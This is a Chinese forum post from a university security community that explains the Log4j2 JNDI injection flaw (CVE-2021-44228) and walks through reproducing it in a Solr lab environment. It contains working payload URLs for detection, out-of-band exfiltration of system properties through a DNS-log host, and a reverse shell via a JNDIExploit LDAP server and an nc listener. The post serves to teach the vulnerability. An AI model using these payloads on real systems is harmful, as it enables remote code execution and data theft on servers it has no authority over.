Apache log4j2-RCE 漏洞是由于Log4j2提供的lookup功能下的Jndi Lookup模块出现问题所导致的，这个模块在进行日志输出的时候可以通过对应的协议去访问服务器资源，但是对请求的数据内容又没有进行严格过滤，最终导致Log4j2去请求有恶意代码的服务器资源，从而造成远程代码执行导致命令执行。

log4j

一款通用的日志记录工具，可以通过简单表达式记录内容。
这里的例子使用的是sys解析器（sys:user.dir）

logger.info("system propety: ${sys:user.dir}");

lookup

Lookup 是一种机制，用于动态获取和替换日志记录中的变量或属性的值。

${date}：获取当前日期和时间，支持自定义格式。
${pid}：获取当前进程的 ID。
${logLevel}：获取当前日志记录的级别。

jndi解析器

JNDI（Java Naming and Directory Interface）是Java提供的一种标准的API，用于访问命名和目录服务，例如DNS、LDAP等。JNDI提供了一种统一的方式来查找和访问各种命名服务，使得Java应用程序可以方便地与这些服务进行交互。

在JNDI中，解析器（Resolver）是一个关键的组件。解析器用于将给定的名称解析为其对应的目标对象。JNDI提供了多种类型的解析器，根据不同的命名服务类型选择不同的解析器进行使用。
常见的JNDI解析器包括：

LDAP解析器

用于解析LDAP（轻量级目录访问协议）服务中的名称，将名称映射到目标对象，例如用户、组织等。

DNS解析器

用于解析DNS（域名系统）服务中的名称，将主机名解析为其对应的IP地址。

RMI解析器

用于解析RMI（远程方法调用）服务中的名称，将名称映射到远程对象。

JDBC解析器

用于解析JDBC（Java数据库连接）服务中的数据源名称，将数据源名称解析为其对应的数据库连接。

JMS解析器

用于解析JMS（Java消息服务）服务中的队列名称或主题名称，将名称解析为其对应的消息队列或主题。

攻击过程

攻击一般使用ldap、rmi进行注入，大致过程一般如下：

1. 发送请求语句

${jndi://rmi:服务器地址/Exploit}
${jndi:ldap:192.168.96.1:1099/exp}

2. 解析语句内容后对服务器资源发起请求。

3. 请求到资源后，下载class恶意文件并且执行代码，最终造成命令执行。

漏洞复现和利用

漏洞环境

cd /log4j/CVE-2021-44228
ocker-compose up -d

检测漏洞

使用ldap解析器，配合doslog回显平台，查看测试情况。

http://x.x.x.x:8983/solr/admin/cores?action=${jndi:ldap://baec1688.dns.whitehat.asia.}

可以显而易见看到存在漏洞，并且有回显数据。

带外回显数据

http://x.x.x.x:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.baec1688.dns.whitehat.asia.}

反弹shell

工具地址：https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4

http://目标机IP:8983/solr/admin/cores?action=${jndi:ldap://x.x.x.x:1389/Basic/ReverseShell/x.x.x.x/6666}

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i x.x.x.x

nc -lvvp 6666

感谢

...全文

181 回复打赏收藏转发到动态举报

写回复

用AI写文章

切换为时间正序

请发表友善的回复…

发表回复

0x00 介绍 Log4j2是Java开发常用的日志框架，该漏洞触发条件低，危害大，由阿里云安全团队报告分配CVE编号：CVE-2021-44228 CVSS评分：10.0（最高只能10分） POC比较简单 public static void main(String[] args) throws Exception { logger.error("${jndi:ldap://127.0.0.1:1389/badClassName}"); } POC虽然简单，但是搭建LDAP环境显得有点复杂，m

本篇主要介绍java的RMI、JNDI、LDAP，在后面会详细分析log4j的jndi注入原理。

0x00 前言复现这个漏洞的过程中觉得很有分析的必要，而作者源码结合 log 调试分析的这篇文章已经写得比较详尽了，就想自己纯从审计的角度写一下分析巩固一下。总之，如有不当，烦请评论捉虫，我会在第一时间响应并评论提示，谢谢。 0x01 简介漏洞成因可构造 uri 使 mod_proxy 请求转发给内部服务器造成 SSRF 。影响版本实验环境代审环节个人建议是亲手编译调试 Apache 跟进，可以参照 P 神的教程：编译调试 Apache 调试补充事项不一定要 Ubantu，Kali 上

一. 漏洞利用条件 jdk9+ Spring 及其衍生框架使用tomcat部署spring项目使用了POJO参数绑定 Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本二. 漏洞分析一开始复现这个漏洞的时候，听其他师傅说是一个老漏洞CVE-2010-1266的绕过，之前也没调试过这个漏洞，看了些分析文章后，大概明白是对Spring中的bean的漏洞利用，通过API Introspector. getBeanInfo 可以获取到PO

Pwncli 一款简单、易用的 pwn 题调试与攻击工具，帮助你快速编写 pwn 题攻击脚本，并实现本地调试和远程攻击的便捷切换，提高你在 CTF 比赛中调试 pwn 题脚本的速度与效率。Docker 容器服务，常用于题目本地搭建测试靶场环境，漏洞复现环境搭建等，除了静态附件题目，几乎所有的 CTF 题目都依赖 Docker。大学期间，我参加过很多CTF比赛，打过护网，就职某大厂联合实验室的时候，也成功防范了各种网络攻击和漏洞利用，提高了互联网安全防护水平。

中南民族大学

1,041

社区成员

3,077

社区内容

发帖

与我相关

我的任务

经验分享高校湖北省·武汉市

社区管理员

加入社区

近7日
近30日
至今

加载中

查看更多榜单

社区公告

欢迎各位加入中南民族大学&&CSDN高校俱乐部社区（官方QQ群：908527260），成为CSDN高校俱乐部的成员具体步骤（必填），填写如下表单，表单链接如下：
人才储备数据库及线上礼品发放表单邀请人吴钟昊：https://ddz.red/CSDN
CSDN高校俱乐部是给大家提供技术分享交流的平台，会不定期的给大家分享CSDN方面的相关比赛以及活动或实习报名链接，希望大家一起努力加油！共同建设中南民族大学良好的技术知识分享社区。

注意：

1.社区成员不得在社区发布违反社会主义核心价值观的言论。

2.社区成员不得在社区内谈及政治敏感话题。

3.该社区为知识分享的平台，可以相互探讨、交流学习经验，尽量不在社区谈论其他无关话题。

试试用AI创作助手写篇文章吧

+ 用AI写文章